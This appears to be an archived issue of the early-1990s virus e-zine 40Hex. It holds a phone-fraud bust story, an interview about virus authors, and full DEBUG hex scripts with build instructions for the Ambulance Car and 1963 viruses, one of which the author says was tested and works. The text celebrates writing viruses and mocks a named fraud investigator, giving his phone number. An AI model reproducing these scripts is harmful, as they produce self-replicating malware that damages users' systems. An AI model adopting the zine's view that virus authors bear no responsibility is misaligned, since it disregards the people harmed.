home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / 40HEXX.ZIP / 40HEX005 < prev    next >
Text File  |  1998-01-21  |  48KB  |  866 lines

  1. 40Hex Number 5 Volume 2 Issue 1                                      File 000
  2.  
  3.         Welcome to Issue 5 of 40Hex, the monthy semi-annual magazine 
  4. published for all those interested in learning more about computer viruses.
  5.         Lots of new news:
  6.  
  7.   1) Well, Hellraiser has lost computer and housing temporarily, so DecimatoR
  8.      had taken over the magazine.  There has been so much new stuff, a lot got
  9.      changed since the time I received this issue.  Special BIG ASS greets to
  10.      him for all of his work on this issue.
  11.   2) Digital Warfare is down, as Instigator got busted for phreaking.  We will
  12.      let you know more when we know more.  Before its demise, its virus
  13.      collection had grown incredibly, thus stocking 40Hex for life.
  14.   3) LandFill BBS went back up. I am back in the scene again.  Give it a ring.
  15.   4) As of the release of this file, I have heard of more busts, specifically,
  16.      Gengis Kahn and Rain Man.... could be rumor.
  17.  
  18.      BTW, for those of you who have the "Anti-FiRe" virus, SCAN 86 catches
  19.      it as "Infinity"... probably due to the text it contains.  Course, it was
  20.      distributed on a VGA loader for the InFiniTy boards... heh heh heh...
  21.  
  22.                                               DecimatoR
  23.  
  24.                                               -)GHeap
  25.  
  26.  
  27.                              40 Hex Mag Issue 5
  28.  
  29.         File 000..............................You Are Here
  30.         File 001..............................BUSTED! Instigator's Story
  31.         File 002..............................Virus Spotlight: Ambulance Car
  32.         File 003..............................The 1963 Virus
  33.         File 004..............................Alliance w/McAfee and Dvorak
  34.         File 005..............................Virus Author's Constitution
  35.         File 006..............................The SKISM Vengeance Virus Hex
  36.         File 007..............................Finding Scan Strings II
  37.  
  38.  
  39. Greets go out to: Hellraiser, Dark Angel, Demogorgon, Piff', Paragon Dude
  40.                   Instigator, Night Crawler, Crow Meister, Lazarus Long,
  41.                   Time Lord, Axiom Codex, and the rest of the Alliance crew.
  42. 40Hex Number 5 Volume 2 Issue 1                                      File 001
  43.  
  44.  
  45.                          Instigator --- Busted!
  46.  
  47. At 2:40 pm EST, Jan 20, '92 a local cop pulled Instigator (me) out of my very
  48. entertaining Social Studies class and informed me he, 1 other local cop and
  49. 2 MCI phone fraud investigators were gonna serve a warrant on my house and
  50. confiscate my computer shit.  So the cop takes me to my house and they start
  51. disassembling all of my computer stuff, and take all of my notes and shit.
  52. They filmed all this.  They informed me I would be charged with theft of
  53. services, credit card fraud and a bunch of other shit, like 3 felonys and
  54. 5 misdimeanors till they were done.  Anyways its about a week and a half 
  55. after the incident now and they only formally charged me with theft of 
  56. services.  So the worst that is gonna happen is I will get 1 year of 
  57. probation.  The best thing is they are thinking of only giving me a citation
  58. or totally dropping the charges.  I am suppose to get my system back after
  59. the DA comes to my house so I can show him how I did it.  As for Digital
  60. Warfare I wanna give to someone to set up.  Anyway I made it to the front
  61. page of 3 local newspapers so here is one of the articles:
  62.  
  63.  
  64. -------------------------------------------------------------------------------
  65.  
  66.                (Shit inside the ***( )*** are my comments)
  67.  
  68.                        From the front page of the     
  69.                          Intelligencer Journal            
  70.  
  71.                2 "Hackers" caught stealing phone service
  72.   
  73.   Using sophisticated computers and telephones, two Lancaster County
  74. computer hackers touched MCI, a Washington-based telephone communications
  75. network, for approximately $4,700 last year. ***( Sophisticated phones? )***
  76.  
  77.   Their activities represent "only the tip of the iceberg" of 
  78. telecommunications fraud, which carries an annual $1 billion to $1.5 billion
  79. price tag, according to John Houser, a MCI spokesman. ***( Dick )***
  80.  
  81.   The two are accused of accessing MCI's computer and obtaining "25 card 
  82. numbers, thet we know about," Houser said.  "We know they made calls all over
  83. the United Sates, to Canada, Great Britain, and West Germany"
  84.  
  85.   "None of the card numbers have been issued to Lancaster subscribers," 
  86. Houser said. 
  87.  
  88.   Columbia police are charging an 18 year old borough resident with credit 
  89. card fraud, unlawful use of a computer, theft of services, and criminal 
  90. conspiracy according to Sgt. C. Joseph Smith. Police are withholding his 
  91. identity until he is formally charged, Smith said.
  92.  
  93.   West Donegal Township chief Charles R. Bronte said a fifteen year old 
  94. suspect ***( that's me! )*** living in his jurisdiction was being refered to
  95. juvenile authorities by the department investigator, Cpl. Kenton Whitebread.
  96.  
  97.   Officers with both departments said this was an entirely new kind of 
  98. criminal case for them.
  99.  
  100.   "I'm still going over our suspectes statement," said Smith, "and even when
  101. I'm done, I don't think I'm going to understand (all the technical jargon). 
  102. We're getting a lot of help from MCI."
  103.  
  104.   "If our juvenile hadn't cooperated, it's possible we'd still be looking at
  105. his equipment", Bronte said.  "He went into the computer, using his access
  106. codes," ***( He means I logged on my board )*** " to retrieve the information
  107. necessary to continue the investigation".
  108.  
  109.   Police confiscated computer telephone equipment, whose value is estimated
  110. ***( Estimated - Gimme a break!)***  in the thousands of dollars, when they
  111. executed search warrants at the residences of both suspects, Jan. 20.
  112.  
  113.   "It was a real United Nations collection," said Bronte, "There were a 
  114. number of different manufacturers" of the equipment taken in West Donegal.
  115. ***( United Nations collection? )***
  116.  
  117.   Most of the equipment taken in Columbia was made by Tandy, Smith said. 
  118.  
  119.   Both posessed programs and equipment which allowed their computers to 
  120. generate thousands of random numbers. 
  121.  
  122.   Houser said that once an individual had knowledge of MCI's calling card
  123. format "they could access our computer switching equipment, and begin 
  124. generating random numbers. ***( they make it sound so technical )*** They
  125. could allow their equipment to run 24 hours a day."
  126.  
  127.   Houser declined discussing the company security, but acknowledged "We
  128. became aware of an unusual number of calls coming into our computer line. We
  129. eventually were able to trace those calls back to the originating telephone 
  130. equipment." ***( ANI )***
  131.  
  132.    Bronte said MCI investigators arrived at his department early Monday
  133. afternoon.  The warrant was executed at 2 pm, Bronte said.  "We took
  134. investigators to the suspects home, while Cpl. Whitebread picked up the
  135. boy at his school. 
  136.     
  137.     Smith said the Columbia warrant was served at 5:18pm on Monday.
  138. The suspect and another individual were working on his computer at the time.
  139. "They weren't doing anything illegal," he said.
  140.  
  141.     Smith said MCI first became aware of the two local hackers "about
  142. Dec. 14".  They were monitoring them since."
  143.  
  144.     The officers said they did not believe either of the two profited
  145. from their activities. ***( Free Phone calls! )***
  146.  
  147.     "I think it was just a case of him getting involved in someting that
  148. was entirely over his head, Bronte said.  ***( Yeah, right )***
  149.  
  150.     Houser said MCI's investigation was continuing.
  151.  
  152.     "We have reason to believe they shared some of their information with
  153. others," he said. "At this time I can tell you we have no other suspects in
  154. Pennsylvania, but that could change tomorrow."
  155.  
  156.     He said investigators were unsure at present if any of the computer
  157. data had been transmitted to other hackers. ***( They said one paragraph up
  158. that they thought we shared some of the information.. Duh )***
  159.  
  160. -------------------------------------------------------------------------------
  161.     Update --
  162.     ------
  163.  
  164.   Here is the current casualties on the 476-9696 system, which is owned by
  165.   TeleConnect, a subsidiary of MCI.
  166.  
  167. Instigator    -----  $1970.70  -----  Theft of Services(1 Count)
  168. Asphi         -----  $2700.00  -----  Unlawful Use of Computer
  169.                                       Credit Card Fraud
  170.                                       Theft Of Services
  171.                                       Criminal Conspiracy
  172. Dekion        -----   UNKNOWN  -----  UNKNOWN
  173. Count Zero    -----  $83.63    -----  No Charges Just Billed (*)
  174. VenoM         -----  $75.00    -----  No Charges Just Billed (*)
  175.  
  176.    Apparently the head of the operations is Terry Oakes.  He is the phone
  177.    Fraud investigator in charge of the TeleConnect Investigations.  Give him a
  178.    ring at 800-476-1234 Ext. 3045.  Thank you.
  179.  
  180. (*) In both cases parents were notified.
  181.                                                 -)GHeap
  182.  
  183. 40Hex Number 5 Volume 2 Issue 1                                      File 002
  184.  
  185.                            Virus Spotlight:
  186.                        The Ambulance Car Virus  
  187.  
  188. Here's a debug script of the Ambulance Car virus.  I've tested the virus
  189. created from this, and it works.  Ambulance Car is a parasitic, non-resident
  190. .COM infector.  It spreads rapidly, and has one of the neatest graphic
  191. displays that I've seen yet in a virus.  When it activates, a little ambulance
  192. drives across the bottom of the screen, from left to right, and a siren is
  193. heard over the PC speaker.  Other than that, all this thing does is replicate.
  194.  
  195. To create the virus from the debug script, cut between the dotted lines and
  196. type:
  197.  
  198.   DEBUG < REDX.TXT > NUL
  199.  
  200. -------------------------------------------------------------------------------
  201.  
  202. n redx.com
  203. e 0100  EB 37 90 48 65 6C 6C 6F 20 2D 20 43 6F 70 79 72 
  204. e 0110  69 67 68 74 20 53 20 26 20 53 20 45 6E 74 65 72 
  205. e 0120  70 72 69 73 65 73 2C 20 31 39 38 38 0A 0D 24 1A 
  206. e 0130  B4 09 BA 03 01 CD 21 CD 20 E8 01 00 01 5E 81 EE 
  207. e 0140  03 01 E8 1A 00 E8 17 00 E8 D2 01 8D 9C 19 04 BF 
  208. e 0150  00 01 8A 07 88 05 8B 47 01 89 45 01 FF E7 C3 E8 
  209. e 0160  DE 00 8A 84 28 04 0A C0 74 F4 8D 9C 0F 04 FF 07 
  210. e 0170  8D 94 28 04 B8 02 3D CD 21 89 84 17 04 8B 9C 17 
  211. e 0180  04 B9 03 00 8D 94 14 04 B4 3F CD 21 8A 84 14 04 
  212. e 0190  3C E9 75 3F 8B 94 15 04 8B 9C 17 04 83 C2 03 33 
  213. e 01A0  C9 B8 00 42 CD 21 8B 9C 17 04 B9 06 00 8D 94 1C 
  214. e 01B0  04 B4 3F CD 21 8B 84 1C 04 8B 9C 1E 04 8B 8C 20 
  215. e 01C0  04 3B 84 00 01 75 0C 3B 9C 02 01 75 06 3B 8C 04 
  216. e 01D0  01 74 64 8B 9C 17 04 33 C9 33 D2 B8 02 42 CD 21 
  217. e 01E0  2D 03 00 89 84 12 04 8B 9C 17 04 B8 00 57 CD 21 
  218. e 01F0  51 52 8B 9C 17 04 B9 19 03 8D 94 00 01 B4 40 CD 
  219. e 0200  21 8B 9C 17 04 B9 03 00 8D 94 14 04 B4 40 CD 21 
  220. e 0210  8B 9C 17 04 33 C9 33 D2 B8 00 42 CD 21 8B 9C 17 
  221. e 0220  04 B9 03 00 8D 94 11 04 B4 40 CD 21 5A 59 8B 9C 
  222. e 0230  17 04 B8 01 57 CD 21 8B 9C 17 04 B4 3E CD 21 C3 
  223. e 0240  A1 2C 00 8E C0 1E B8 40 00 8E D8 8B 2E 6C 00 1F 
  224. e 0250  F7 C5 03 00 74 17 33 DB 26 8B 07 3D 50 41 75 08 
  225. e 0260  26 81 7F 02 54 48 74 0B 43 0B C0 75 EB 8D BC 28 
  226. e 0270  04 EB 32 83 C3 05 8D BC 28 04 26 8A 07 43 0A C0 
  227. e 0280  74 19 3C 3B 74 05 88 05 47 EB EF 26 80 3F 00 74 
  228. e 0290  0A D1 ED D1 ED F7 C5 03 00 75 DB 80 7D FF 5C 74 
  229. e 02A0  04 C6 05 5C 47 1E 07 89 BC 22 04 B8 2A 2E AB B8 
  230. e 02B0  43 4F AB B8 4D 00 AB 06 B4 2F CD 21 8C C0 89 84 
  231. e 02C0  24 04 89 9C 26 04 07 8D 94 78 04 B4 1A CD 21 8D 
  232. e 02D0  94 28 04 33 C9 B4 4E CD 21 73 08 33 C0 89 84 28 
  233. e 02E0  04 EB 29 1E B8 40 00 8E D8 D1 CD 33 2E 6C 00 1F 
  234. e 02F0  F7 C5 07 00 74 06 B4 4F CD 21 73 E7 8B BC 22 04 
  235. e 0300  8D 9C 96 04 8A 07 43 AA 0A C0 75 F8 8B 9C 26 04 
  236. e 0310  8B 84 24 04 1E 8E D8 B4 1A CD 21 1F C3 06 8B 84 
  237. e 0320  0F 04 25 07 00 3D 06 00 75 15 B8 40 00 8E C0 26 
  238. e 0330  A1 0C 00 0B C0 75 08 26 FF 06 0C 00 E8 02 00 07 
  239. e 0340  C3 1E BF 00 B8 B8 40 00 8E D8 A0 49 00 3C 07 75 
  240. e 0350  03 BF 00 B0 8E C7 1F BD F0 FF BA 00 00 B9 10 00 
  241. e 0360  E8 3F 00 42 E2 FA E8 16 00 E8 7B 00 45 83 FD 50 
  242. e 0370  75 E8 E8 03 00 1E 07 C3 E4 61 24 FC E6 61 C3 BA 
  243. e 0380  D0 07 F7 C5 04 00 74 03 BA B8 0B E4 61 A8 03 75 
  244. e 0390  08 0C 03 E6 61 B0 B6 E6 43 8B C2 E6 42 8A C4 E6 
  245. e 03A0  42 C3 51 52 8D 9C BF 03 03 DA 03 D5 0B D2 78 34 
  246. e 03B0  83 FA 50 73 2F BF 80 0C 03 FA 03 FA 2B D5 B9 05 
  247. e 03C0  00 B4 07 8A 07 2C 07 02 C1 2A C2 83 F9 05 75 0A 
  248. e 03D0  B4 0F F7 C5 03 00 74 02 B0 20 AB 83 C3 10 81 C7 
  249. e 03E0  9E 00 E2 DD 5A 59 C3 1E B8 40 00 8E D8 A1 6C 00 
  250. e 03F0  3B 06 6C 00 74 FA 1F C3 22 23 24 25 26 27 28 29 
  251. e 0400  66 87 3B 2D 2E 2F 30 31 23 E0 E1 E2 E3 E4 E5 E6 
  252. e 0410  E7 E7 E9 EA EB 30 31 32 24 E0 E1 E2 E3 E8 2A EA 
  253. e 0420  E7 E8 E9 2F 30 6D 32 33 25 E1 E2 E3 E4 E5 E7 E7 
  254. e 0430  E8 E9 EA EB EC ED EE EF 26 E6 E7 29 59 5A 2C EC 
  255. e 0440  ED EE EF F0 32 62 34 F4 09 00 E9 36 00 EB 2E 90 
  256. e 0450  05 00 EB 2E 90 
  257.  
  258. rcx
  259. 0355
  260. w
  261. q
  262.  
  263. -------------------------------------------------------------------------------
  264.                                                                             DA
  265. 40Hex Number 5 Volume 2 Issue 1                                      File 003
  266.  
  267.                                The 1963 Virus
  268.                              
  269.         Here's a debug script of 1963.  It's classified as an overwriting
  270. virus, but it attaches the code it overwrites onto the end of the file it
  271. infects...  so it overwrites, but it doesn't.  Sort of.
  272.  
  273. -------------------------------------------------------------------------------
  274.  
  275. n 1963.com
  276. e 0100  B4 30 CD 21 3C 03 72 07 B8 00 12 CD 2F 3C FF B8 
  277. e 0110  0B 00 72 71 B4 4A BB 40 01 CD 21 72 68 FA 0E 17 
  278. e 0120  BC FE 13 E8 C5 00 FB A1 2C 00 0B C0 74 61 E8 BB 
  279. e 0130  06 8E C0 33 FF 33 C0 AF 75 FD AF 8B D7 06 1F B4 
  280. e 0140  48 BB FF FF CD 21 B4 48 CD 21 8E C0 B4 49 CD 21 
  281. e 0150  33 C0 8B CB 8C C3 51 B9 08 00 33 FF F3 AB 43 8E 
  282. e 0160  C3 59 E2 F2 0E 07 BB 04 09 8B FB AB B0 80 AB 8C 
  283. e 0170  C8 AB B8 5C 00 AB 8C C8 AB B8 6C 00 AB 8C C8 AB 
  284. e 0180  B8 00 4B CD 21 0E 1F E8 62 06 2E FF 2E 0A 00 B8 
  285. e 0190  20 12 BB 05 00 CD 2F 53 4B 4B 26 88 1D B8 16 12 
  286. e 01A0  CD 2F 4B 4B 26 89 1D B4 48 BB FF FF CD 21 B4 48 
  287. e 01B0  CD 21 8E D8 5B B8 00 42 33 C9 33 D2 CD 21 B4 3F 
  288. e 01C0  BA 00 01 26 8B 4D 11 CD 21 72 BA B4 3E CD 21 B4 
  289. e 01D0  26 8C DA CD 21 4A 8E C2 26 8C 1E 01 00 42 8E C2 
  290. e 01E0  8E D2 BC FE FF 1E B8 00 01 50 CB 1E B8 03 12 CD 
  291. e 01F0  2F 2E 8C 1E 04 09 33 F6 8E DE BF 88 02 8C CE 87 
  292. e 0200  3E 04 00 87 36 06 00 9C 9C 9C 8B EC 80 4E 01 01 
  293. e 0210  9D 9C 9C 2E C7 06 06 09 AF 08 B4 01 FF 1E 4C 00 
  294. e 0220  9D 2E C7 06 06 09 AB 08 B4 0B FF 1E 84 00 9D 89 
  295. e 0230  3E 04 00 89 36 06 00 1F 1E 06 8C CB BD AE 02 A1 
  296. e 0240  AB 08 8B 16 AD 08 33 F6 8E DE 3B 06 84 00 75 10 
  297. e 0250  3B 16 86 00 75 0A 89 2E 84 00 89 1E 86 00 EB 25 
  298. e 0260  B8 AB 08 8E C3 B9 10 00 FC 8B F8 8E DA A7 75 0B 
  299. e 0270  A7 75 06 89 6C FC 89 5C FE 4E 4E 4E E2 EB 87 F1 
  300. e 0280  42 3B D3 75 E4 07 1F C3 55 8B EC 50 8B 46 04 2E 
  301. e 0290  3B 06 04 09 77 15 53 2E 8B 1E 06 09 2E 89 47 02 
  302. e 02A0  8B 46 02 2E 89 07 80 66 07 FE 5B 58 5D CF 55 8B 
  303. e 02B0  EC 80 FC 48 74 0A 80 FC 4A 74 05 3D 03 4B 75 0C 
  304. e 02C0  E8 89 05 E8 AF 05 9C E8 87 05 EB 55 80 FC 31 74 
  305. e 02D0  05 80 FC 4C 75 0D 53 BB 13 00 E8 55 02 4B 79 FA 
  306. e 02E0  5B EB 5F 80 FC 0F 74 0F 80 FC 10 74 0A 80 FC 17 
  307. e 02F0  74 05 80 FC 23 75 05 E8 25 05 EB 46 80 FC 3F 75 
  308. e 0300  25 E8 2E 02 73 06 B8 05 00 E9 F7 00 75 34 E8 64 
  309. e 0310  05 72 F6 9C E8 6D 05 1E 07 8B FA E8 67 04 E8 75 
  310. e 0320  05 9D 5D CA 02 00 80 FC 3D 74 0A 80 FC 43 74 05 
  311. e 0330  80 FC 56 75 05 E8 E1 01 EB 08 80 FC 3E 75 0E E8 
  312. e 0340  F0 01 FF 76 06 9D 5D FA 2E FF 2E AB 08 80 FC 14 
  313. e 0350  74 0D 80 FC 21 74 08 80 FC 27 74 03 E9 7F 00 E8 
  314. e 0360  BD 04 73 04 5D B0 01 CF 75 D8 E8 17 05 E8 A4 04 
  315. e 0370  80 FC 14 75 14 8B 44 0C BA 80 00 F7 E2 33 DB 02 
  316. e 0380  44 20 12 E3 13 DA 93 EB 06 8B 44 23 8B 5C 21 8B 
  317. e 0390  4C 0E F7 E1 73 05 E8 FD 04 EB C9 93 F7 E1 03 D3 
  318. e 03A0  72 F4 2E A3 D0 08 2E 89 16 D2 08 2E 89 0E D4 08 
  319. e 03B0  E8 E3 04 E8 BF 04 0A C0 74 04 3C 03 75 1E E8 C3 
  320. e 03C0  04 80 FC 27 2E A1 D4 08 75 04 F7 E1 72 C8 50 B4 
  321. e 03D0  2F CD 21 8B FB 58 E8 AC 03 E8 BA 04 5D CF 3D 00 
  322. e 03E0  4B 74 2A 3D 01 4B 74 03 E9 57 FF E8 41 00 72 13 
  323. e 03F0  56 57 1E 0E 1F BE E2 08 8D 7F 0E FC A5 A5 A5 A5 
  324. e 0400  1F 5F 5E 9C D0 6E 06 9D D0 56 06 5D CF E8 1F 00 
  325. e 0410  72 F1 50 B4 51 CD 21 8E DB 8E C3 58 FA 2E 8B 26 
  326. e 0420  E2 08 2E 8E 16 E4 08 44 44 FB 2E FF 2E E6 08 E8 
  327. e 0430  52 04 F9 E8 E4 00 B8 0B 00 72 32 FC 9C 1E B8 22 
  328. e 0440  35 CD 21 2E 89 1E B7 08 2E 8C 06 B9 08 C5 76 0A 
  329. e 0450  0E 07 BF D4 08 8B DF B9 07 00 F3 A5 1F E8 EC 03 
  330. e 0460  52 B8 01 4B E8 12 04 5A E8 E6 03 73 07 89 46 08 
  331. e 0470  E8 23 04 C3 89 46 08 B4 51 CD 21 8E C3 8B 76 00 
  332. e 0480  36 C5 54 02 26 89 16 0A 00 26 8C 1E 0C 00 B8 22 
  333. e 0490  25 CD 21 9D 75 DA 0E 1F BE 04 09 BF 00 01 B9 AB 
  334. e 04A0  07 F3 A4 E8 B2 02 74 03 F8 EB C5 8B FB 83 C7 10 
  335. e 04B0  A1 B1 10 A3 E6 08 A1 B3 10 03 C7 A3 E8 08 8B 0E 
  336. e 04C0  AF 10 0B C9 74 E2 C5 56 0E E8 96 03 72 35 8B D8 
  337. e 04D0  51 0E 1F 33 C9 8B 16 02 09 E8 8F 03 BA 04 09 59 
  338. e 04E0  51 B9 04 00 E8 7D 02 59 72 16 8B F2 1E 8B 44 02 
  339. e 04F0  8B 34 03 C7 8E D8 01 3C 1F E2 E5 E8 69 03 EB A8 
  340. e 0500  E8 64 03 06 1F 2E C4 1E B7 08 89 1E 0A 00 8C 06 
  341. e 0510  0E 00 E8 D7 02 F9 E9 1D FF F8 50 53 9C E8 42 03 
  342. e 0520  72 0C 8B D8 9D 9C E8 0A 00 9C E8 3A 03 9D 5B 5B 
  343. e 0530  58 C3 F8 FC E8 4D 03 9C 53 B8 20 12 CD 2F 72 0C 
  344. e 0540  32 FF 26 8A 1D B8 16 12 CD 2F 73 04 E8 47 03 C3 
  345. e 0550  06 0E 1F B8 23 35 CD 21 89 1E BB 08 8C 06 BD 08 
  346. e 0560  40 CD 21 89 1E BF 08 8C 06 C1 08 B4 25 BA 81 08 
  347. e 0570  CD 21 48 42 42 CD 21 07 5B B0 02 26 86 45 02 A2 
  348. e 0580  C9 08 26 8B 45 05 A3 CA 08 26 8B 45 15 A3 D0 08 
  349. e 0590  26 8B 45 17 A3 D2 08 26 8B 45 11 26 8B 55 13 A3 
  350. e 05A0  CC 08 89 16 CE 08 3D 1A 00 83 DA 00 72 55 9D 72 
  351. e 05B0  16 26 8B 45 28 3D 45 58 74 07 3D 43 4F 75 44 B0 
  352. e 05C0  4D 26 3A 45 2A 75 3C 33 C9 33 D2 E8 9D 02 BA EA 
  353. e 05D0  08 B1 1A E8 8E 01 72 3D 33 C9 33 D2 E8 79 01 75 
  354. e 05E0  0B A1 F2 08 B2 10 F7 E2 8B CA 8B D0 51 52 81 C2 
  355. e 05F0  AB 07 83 D1 00 3B 0E CE 08 75 04 3B 16 CC 08 5A 
  356. e 0600  59 76 02 EB 58 51 52 E8 61 02 BA 04 09 B9 AB 07 
  357. e 0610  E8 51 01 73 02 EB 3F 06 57 0E 07 BE EF 09 BF EB 
  358. e 0620  01 B9 C3 00 F3 A6 5F 07 75 5F 8B D1 E8 41 02 B9 
  359. e 0630  AD 07 BA 04 09 E8 20 01 75 03 83 C1 06 26 01 4D 
  360. e 0640  11 26 83 55 13 00 E8 1B 01 72 0B 8B F2 49 49 E8 
  361. e 0650  26 01 3B 14 74 03 F9 EB 08 3A C0 EB 04 B0 01 3C 
  362. e 0660  00 9C BE C9 08 FC 47 47 A4 47 47 A5 83 C7 0A A5 
  363. e 0670  A5 A5 A5 B8 24 25 C5 16 BF 08 CD 21 48 2E C5 16 
  364. e 0680  BB 08 CD 21 9D E8 0E 02 C3 26 F6 45 04 04 75 CD 
  365. e 0690  B4 0D CD 21 53 1E 06 B8 40 35 CD 21 89 1E C3 08 
  366. e 06A0  8C 06 C5 08 B0 13 CD 21 89 1E B3 08 8C 06 B5 08 
  367. e 06B0  B4 25 C5 16 AF 08 CD 21 B0 40 BA 59 EC BB 00 F0 
  368. e 06C0  8E DB CD 21 07 1F 5B 33 C9 33 D2 E8 A2 01 B9 AB 
  369. e 06D0  07 BE 04 09 E8 81 00 75 15 83 C1 06 A1 F0 08 A3 
  370. e 06E0  AF 10 A1 FE 08 A3 B1 10 A1 00 09 A3 B3 10 56 E8 
  371. e 06F0  86 00 89 14 5A 41 41 E8 74 00 72 39 5A 59 E8 6A 
  372. e 0700  01 BA 00 01 B9 AB 07 E8 64 00 72 2F E8 49 00 75 
  373. e 0710  20 33 C9 89 0E F0 08 89 16 FE 08 C7 06 00 09 F0 
  374. e 0720  FF 33 D2 E8 45 01 BA EA 08 B9 1A 00 E8 3F 00 72 
  375. e 0730  0A 3A C0 EB 07 B0 01 3C 00 EB 01 F9 9C B4 0D CD 
  376. e 0740  21 1E B8 13 25 C5 16 B3 08 CD 21 B0 40 2E C5 16 
  377. e 0750  C3 08 CD 21 1F E9 0A FF A1 EA 08 3D 4D 5A 74 03 
  378. e 0760  3D 5A 4D C3 B4 3F E8 10 01 72 02 3B C1 C3 B4 40 
  379. e 0770  E8 06 01 72 02 3B C1 C3 51 33 D2 AC 02 D0 80 D6 
  380. e 0780  00 E2 F8 59 C3 0E 1F BE 04 09 8B D8 B9 AB 07 E8 
  381. e 0790  C6 FF 75 27 A1 F2 08 BA 10 00 F7 E2 53 57 E8 1E 
  382. e 07A0  00 5F 5B BE EA 08 B9 1A 00 A1 AF 10 A3 F0 08 A1 
  383. e 07B0  B1 10 A3 FE 08 A1 B3 10 A3 00 09 33 C0 33 D2 2B 
  384. e 07C0  06 D0 08 1B 16 D2 08 72 0A 75 20 2B D8 76 1C 03 
  385. e 07D0  F8 EB 0F F7 D8 83 D2 00 F7 DA 75 0F 2B C8 76 0B 
  386. e 07E0  03 F0 3B CB 76 02 8B CB FC F3 A4 C3 9C E8 94 00 
  387. e 07F0  B4 49 1E 07 CD 21 B4 49 8E 06 2C 00 CD 21 B4 50 
  388. e 0800  8B 1E 16 00 CD 21 B8 22 25 C5 16 0A 00 CD 21 E8 
  389. e 0810  84 00 9D C3 8B F2 80 3C FF 75 03 83 C6 07 C3 E8 
  390. e 0820  62 00 E8 EF FF 0E 07 BA 04 09 8B FA FC AC 0A C0 
  391. e 0830  74 05 04 40 B4 3A AB A5 A5 A5 A5 B0 2E AA A5 A4 
  392. e 0840  32 C0 AA 06 1F E8 D1 FC E8 4B 00 C3 50 8C C8 EB 
  393. e 0850  03 50 33 C0 53 1E 8C CB 4B 8E DB A3 01 00 1F 5B 
  394. e 0860  58 C3 B8 00 3D EB 12 B4 3E EB 0E B8 00 42 EB 09 
  395. e 0870  B8 02 42 EB 04 FF 76 06 9D 9C FA 2E FF 1E AB 08 
  396. e 0880  C3 B0 03 CF 2E 8F 06 C7 08 1E 52 06 53 50 51 56 
  397. e 0890  57 55 8B EC EB 10 2E 8F 06 C7 08 8B E5 5D 5F 5E 
  398. e 08A0  59 58 5B 07 5A 1F 2E FF 26 C7 08 00 00 00 00 00 
  399. e 08B0  00 00 00 00 00 44 83 00 00 44 83 00 00 44 83 00 
  400. e 08C0  00 44 83 00 00 44 83 00 00 00 00 00 00 00 00 00 
  401. e 08D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
  402. e 08E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
  403. e 08F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
  404.  
  405. rcx
  406. 0800
  407. w
  408. q
  409.  
  410. -------------------------------------------------------------------------------
  411.                                                                             DA
  412. 40Hex Number 5 Volume 2 Issue 1                                      File 004
  413.  
  414.                                Forty Hex 5
  415.                                 Presents
  416.  
  417.                         An Alliance Interview with
  418.                          John McAfee + Jon Dvorak
  419.                                    and
  420.                      Hellraiser, Garbageheap, DecimatoR,
  421.                       Count Zero, CRoW MeiSTeR, Instigator,
  422.                        Demogorgon, Dark Angel, Night Crawler,
  423.                         VenoM, Time Lord, Darkman.
  424.  
  425.     On Feb. 2nd of 1992, an alliance was run with members of PHALCON/SKISM,
  426.     NuKE, and Ex-RABiD.  We started the conference by trying to call Patti
  427.     Hoffman, who had a shit fit, and denied being the author of VSUM.  Nice
  428.     of her to insult our intelligence.  But anyways, we then called McAfee,
  429.     who was surprisingly a nice guy.  He was interested in what we had to say.
  430.     Some of the topics covered were which viruses we had written, what types
  431.     of viri they were(i.e. MemRes, Stealth...).  Another important topic
  432.     covered the Bob Ross Virus which an associate of McAfee had misnamed the
  433.     Beta Virus(it was first spread on a false version of BNU(1.90Beta)).
  434.  
  435.     On the following day, we started a second alliance, this time involving
  436.     Count Zero, CRoW MeiSTeR, Dark Angel, Demogorgon, Garbageheap(moi!),
  437.     Hellraiser, Instigator, Night Crawler and Time Lord.  Also in the
  438.     conference were John Markoff(New York Times), Michael Alexander(Computer
  439.     World), and John McAfee.  A variety of topics were covered, I won't go into
  440.     specifics here, because in a future issue we will have a full transcript,
  441.     and in this issue we will have the article from the Feb. 10,1992 Vol.XXVI
  442.     No. 6 issue of COMPUTERWORLD.
  443.  
  444.     ---------------------------------------------------------------------------
  445.     CHALLENGE, NOTORIETY CITED AS IMPETUS FOR VIRUS DEVELOPERS(*Catchy title*)
  446.                         By: Michael Alexander/CW STAFF
  447.  
  448.          What motivates a programmer to write a virus?  The thrill, declared
  449.     Hell Raiser,(* that is supposed to be Hellraiser *) a self-styled virus
  450.     author and a member of Phalcon/Skism, a group of about a dozen computer
  451.     hackers scattered across North America.
  452.          In an unusual telephone conference call to COMPUTERWORLD last week, 10
  453.     callers who said they were members of Phalcon/Skism claimed to be
  454.     responsible for writing several of the viruses now on the
  455.     loose.(* CLAIMED?!?!?!!  Well, I suppose that he couldnt know if we were the
  456.     real McCoy *)
  457.          To protect their identities, the callers used such handles as Garbage
  458.     Heap(* Grabbin' top billin'! *), Nightcrawler, Demogorgon, Dark Angel, and
  459.     Time Lord.  They said their ages range from 15 to 23 years old, although
  460.     COMPUTERWORLD could not independantly verify their identities.
  461.  
  462.     GETTING ATTENTION
  463.     -----------------
  464.          The virus authors, as they called themselves, said they arranged the
  465.     teleconference to air their side of the story, and to talk about their
  466.     unorthadox and contradictory brand of computer ethics. (* Well... close,
  467.     we were real bored... of course, who wants to talk to bored virus
  468.     authors... *)  "For the most part, virus authors are seen as a lot more
  469.     malicious than we actually are," Garbage Heap said.
  470.          His compatriots said they write viruses mainly for the thrill but
  471.     also for the challenge and the status it brings within the computer
  472.     underground.  The group said it is not interested in doing harm, and
  473.     seldom creates viruses that are deliberately designed to cause damage.
  474.     "It's sort of like graffiti  -  getting our name across  -  and damage
  475.     happens in the process," he claimed.(* Hellraiser *)
  476.          As an example of the type of virus they write, the group took credit
  477.     for writing the Bob Ross Virus, named after the painter of the same name on
  478.     who hosts a show on Public Broadcasting Service.
  479.          "What it does is infect files and randomly displays 'Bobisms,' which
  480.     are messages Bob Ross would say," Hell Raiser said.  "It doesn't format
  481.     the hard drive or do any damage."
  482.          However, other alleged members of Phalcon/Skism later admitted to
  483.     writing viruses that are clearly intended to damage or destroy programs
  484.     and data.(* Hellraiser again... *)
  485.          The callers contended that they are virus "authors," not virus
  486.     "spreaders," and that they are not responsible for the problems their
  487.     creations cause.
